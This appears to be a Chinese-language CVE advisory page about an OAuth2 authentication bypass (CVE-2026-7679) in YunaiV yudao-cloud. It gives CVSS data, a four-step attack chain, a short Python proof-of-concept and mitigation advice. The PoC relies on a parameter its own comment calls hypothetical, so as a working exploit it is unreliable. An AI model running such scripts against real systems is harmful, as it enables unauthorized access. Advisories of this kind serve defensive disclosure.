CVE-2026-7679 CVSS 7.3 高危

CVE-2026-7679 YunaiV yudao-cloud认证绕过漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7679

漏洞类型

认证绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YunaiV yudao-cloud

漏洞概述

YunaiV yudao-cloud 2026.01及之前版本被发现存在安全漏洞。该漏洞源于文件 `yudao-module-system-biz/src/main/java/io/github/ruoyi/common/oauth2/service/impl/OAuth2TokenServiceImpl.java` 中的 `getAccessToken` 函数存在逻辑缺陷。攻击者可以通过操纵输入数据导致不当认证，从而远程发起攻击而无需用户交互。目前该漏洞的利用代码已被公开披露，且厂商早期联系后未作任何回应，风险较高。

技术细节

漏洞位于OAuth2令牌服务的实现逻辑中。在 `OAuth2TokenServiceImpl.java` 文件的 `getAccessToken` 方法中，程序未能正确验证请求者的身份或令牌请求的完整性。攻击者可以通过构造恶意的HTTP请求，利用该逻辑缺陷绕过正常的身份验证流程。由于CVSS向量显示无需认证（PR:N）且无需用户交互（UI:N），远程攻击者可直接利用此漏洞获取有效的访问令牌。这会导致系统的机密性、完整性和可用性受到低至中等程度的影响，具体取决于后续利用操作。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是 YunaiV yudao-cloud 2026.01 或更早版本，并定位 OAuth2 令牌获取接口。

STEP 2

漏洞利用

攻击者向 `getAccessToken` 端点发送特制的恶意请求数据，利用身份验证逻辑缺陷。

STEP 3

绕过认证

由于系统未正确校验，攻击者在未提供有效凭证的情况下成功获取访问令牌。

STEP 4

未授权访问

攻击者使用获取的令牌访问受保护的API接口，窃取数据或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-domain/api/system/oauth2/token"

# Malicious payload to bypass authentication in getAccessToken
payload = {
    "grant_type": "password",
    "username": "",
    "password": "",
    "client_id": "test",
    "client_secret": "test",
    "bypass_param": "logic_flaw_trigger" # Hypothetical parameter triggering the flaw
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200 and "access_token" in response.text:
        print("[+] Exploit successful! Token obtained:")
        print(response.json())
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

YunaiV yudao-cloud <= 2026.01

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议暂时在WAF（Web应用防火墙）中部署规则，拦截对OAuth接口的异常请求参数；或者在网络层面限制只允许受信任的IP地址访问系统认证接口。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7679
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7679
3 Details https://www.cvedetails.com/cve/CVE-2026-7679/
4 VulDB https://vuldb.com/cve/CVE-2026-7679
5 Link https://github.com/9str0IL/CVE/issues/1
6 Link https://vuldb.com/submit/800866
7 Link https://vuldb.com/vuln/360832
8 Link https://vuldb.com/vuln/360832/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表